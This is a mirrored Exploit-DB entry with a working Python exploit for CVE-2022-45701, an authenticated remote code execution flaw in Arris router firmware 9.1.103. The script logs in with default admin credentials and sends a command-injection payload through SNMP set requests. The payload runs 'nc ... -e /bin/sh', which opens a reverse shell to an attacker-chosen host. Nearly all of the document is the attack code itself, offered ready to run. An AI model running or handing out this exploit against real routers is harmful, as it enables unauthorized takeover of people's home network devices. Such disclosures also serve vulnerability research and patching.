11

[remote] Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authentica...

 1 year ago
source link: https://www.exploit-db.com/exploits/51269
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)

EDB-ID:

51269

EDB Verified:

Platform:

Hardware

Date:

2023-04-06

Vulnerable App:

# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701

import requests
import base64

router_host = "http://192.168.0.1"
username = "admin"
password = "password"

lhost = "192.168.0.6"
lport = 80


def main():
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def no_encode_params(params):
    return  "&".join("%s=%s" % (k,v) for k,v in params.items())

def get_cookie(header):
    url = router_host+"/login"
    params = no_encode_params({"arg":header, "_n":1})
    resp=requests.get(url, params=params)
    return resp.content.decode('UTF-8')

def set_oid(oid, cookie):
    url = router_host+"/snmpSet"
    params = no_encode_params({"oid":oid, "_n":1})
    cookies = {"credential":cookie}
    requests.get(url, params=params, cookies=cookies)

def gen_payload(h, p):
    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"

def send_payload(payload, cookie):
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
    

if __name__ == '__main__':
    main()

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK